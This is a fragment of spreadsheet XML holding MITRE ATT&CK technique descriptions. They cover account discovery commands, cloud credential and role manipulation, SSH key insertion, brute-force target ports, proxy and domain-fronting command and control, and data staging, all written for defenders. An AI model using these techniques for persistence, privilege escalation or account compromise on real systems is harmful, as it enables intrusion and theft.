  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)"/>
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts._x000a__x000a_Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)_x000a__x000a_Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders."/>
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) "/>
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Protocols such as SMB(Citation: US-CERT TA18-074A), FTP(Citation: ESET Machete July 2019),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
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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Citation: FireEye APT28) "/>
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="37"/>
    <x v="0"/>
    <s v="Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. _x000a__x000a_Protocols such as &lt;code&gt;MQTT&lt;/code&gt;, &lt;code&gt;XMPP&lt;/code&gt;, &lt;code&gt;AMQP&lt;/code&gt;, and &lt;code&gt;STOMP&lt;/code&gt; use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic."/>
  </r>
  <r>
    <x v="38"/>
    <x v="14"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)_x000a__x000a_Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)_x000a__x000a_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
  </r>
  <r>
    <x v="39"/>
    <x v="2"/>
    <s v="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_x000a__x000a_In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)_x000a__x000a_Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection."/>
  </r>
  <r>
    <x v="39"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)"/>
  </r>
  <r>
    <x v="39"/>
    <x v="2"/>
    <s v="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_x000a__x000a_In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)_x000a__x000a_By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection."/>
  </r>
  <r>
    <x v="40"/>
    <x v="15"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="40"/>
    <x v="15"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="40"/>
    <x v="15"/>
    <s v="Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(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_x000a__x000a_Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain."/>
  </r>
  <r>
    <x v="40"/>
    <x v="15"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="40"/>
    <x v="15"/>
    <s v="Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)_x000a__x000a_Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices._x000a__x000a_An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. _x000a__x000a_Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. _x000a_"/>
  </r>
  <r>
    <x v="41"/>
    <x v="6"/>
    <s v="_x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="42"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="43"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Some files and directories may require elevated or specific user permissions to access."/>
  </r>
  <r>
    <x v="44"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment._x000a__x000a_For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files."/>
  </r>
  <r>
    <x v="44"/>
    <x v="4"/>
    <s v="Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior._x000a__x000a_Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt; on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts."/>
  </r>
  <r>
    <x v="44"/>
    <x v="4"/>
    <s v="Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges._x000a__x000a_Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  "/>
  </r>
  <r>
    <x v="44"/>
    <x v="4"/>
    <s v="Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)_x000a__x000a_In on-premises Exchange and Exchange Online, the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)_x000a__x000a_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
  </r>
  <r>
    <x v="44"/>
    <x v="4"/>
    <s v="Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic."/>
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="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_x000a__x000a_By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems."/>
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="Adversaries may chain together multiple proxies to disguise the source of malicious traffic.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_x000a__x000a_For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant) _x000a__x000a_In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  _x000a__x000a_Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)"/>
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="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quot;domainless&quot; fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored)._x000a__x000a_For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y."/>
  </r>
  <r>
    <x v="46"/>
    <x v="16"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="47"/>
    <x v="0"/>
    <s v="Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014)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
  </r>
  <r>
    <x v="48"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. _x000a__x000a_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
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment._x000a__x000a_For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra I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_x000a__x000a_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_x000a__x000a_Adversaries may also use the &lt;code&gt;CreateAccessKey&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud iam service-accounts keys create&lt;/code&gt; command in GCP to add access keys to an account. Alternatively, they may use the &lt;code&gt;CreateLoginProfile&lt;/code&gt; API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) _x000a__x000a_In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated._x000a_(Citation: Crowdstrike AWS User Federation Persistence)_x000a__x000a_In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)"/>
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. _x000a__x000a_For example,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In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) _x000a__x000a_Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)_x000a__x000a_This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)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
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)_x000a_(Citation: Microsoft O365 Admin Roles) _x000a__x000a_This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts._x000a__x000a_For example, in AWS environments, an adversary with appropriate permissions may be able to use the &lt;code&gt;CreatePolicyVersion&lt;/code&gt; API to define a new version of an IAM policy or the &lt;code&gt;AttachUserPolicy&lt;/code&gt; API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)_x000a__x000a_In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)"/>
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user._x000a__x000a_Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. _x000a__x000a_SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)"/>
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance._x000a__x000a_MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)_x000a__x000a_Similarly, an adversary with existing access to a network may register a device to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) _x000a__x000a_Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)"/>
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)_x000a_ _x000a_This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.  _x000a__x000a_Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based  role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)."/>
  </r>
  <r>
    <x v="49"/>
    <x v="7"/>
    <s v="An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain._x000a__x000a_On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)_x000a__x000a_For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges. _x000a__x000a_In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)"/>
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <s v="Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection._x000a__x000a_Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="51"/>
    <x v="0"/>
    <s v="Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult._x000a__x000a_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_x000a__x000a_The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked."/>
  </r>
  <r>
    <x v="52"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)_x000a__x000a_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
  </r>
  <r>
    <x v="53"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="54"/>
    <x v="1"/>
    <s v="Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes._x000a__x000a_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
  </r>
  <r>
    <x v="54"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)_x000a__x000a_Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a_* SNMP (161/UDP and 162/TCP/UDP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)_x000a__x000a_In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows &quot;logon failure&quot; event ID 4625."/>
  </r>
  <r>
    <x v="54"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="54"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)_x000a__x000a_In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows &quot;logon failure&quot; event ID 4625."/>
  </r>
  <r>
    <x v="54"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies._x000a__x000a_Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:_x000a__x000a_* SSH (22/TCP)_x000a_* Telnet (23/TCP)_x000a_* FTP (21/TCP)_x000a_* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)_x000a_* LDAP (389/TCP)_x000a_* Kerberos (88/TCP)_x000a_* RDP / Terminal Services (3389/TCP)_x000a_* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)_x000a_* MSSQL (1433/TCP)_x000a_* Oracle (1521/TCP)_x000a_* MySQL (3306/TCP)_x000a_* VNC (5900/TCP)_x000a__x000a_In addition to management services, adversaries may &quot;target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,&quot; as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)"/>
  </r>
  <r>
    <x v="55"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="56"/>
    <x v="3"/>
    <s v="Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="57"/>
    <x v="2"/>
    <s v="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_x000a_"/>
  </r>
  <r>
    <x v="58"/>
    <x v="2"/>
    <s v="Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients. "/>
  </r>
  <r>
    <x v="58"/>
    <x v="2"/>
    <s v="Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files._x000a__x000a_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
  </r>
  <r>
    <x v="58"/>
    <x v="2"/>
    <s v="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
  </r>
  <r>
    <x v="58"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="59"/>
    <x v="2"/>
    <s v="Adversaries may collect data stored in the clipboard from users copying information within or between applications. _x000a__x000a_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_x000a__x000a_macOS and Linux also have commands, such as &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)"/>
  </r>
  <r>
    <x v="60"/>
    <x v="2"/>
    <s v="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_x000a__x000a_In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) _x000a__x000a_This functionality could also be built into remote access tools. _x000a__x000a_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
  </r>
  <r>
    <x v="61"/>
    <x v="4"/>
    <s v="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
  </r>
  <r>
    <x v="62"/>
    <x v="2"/>
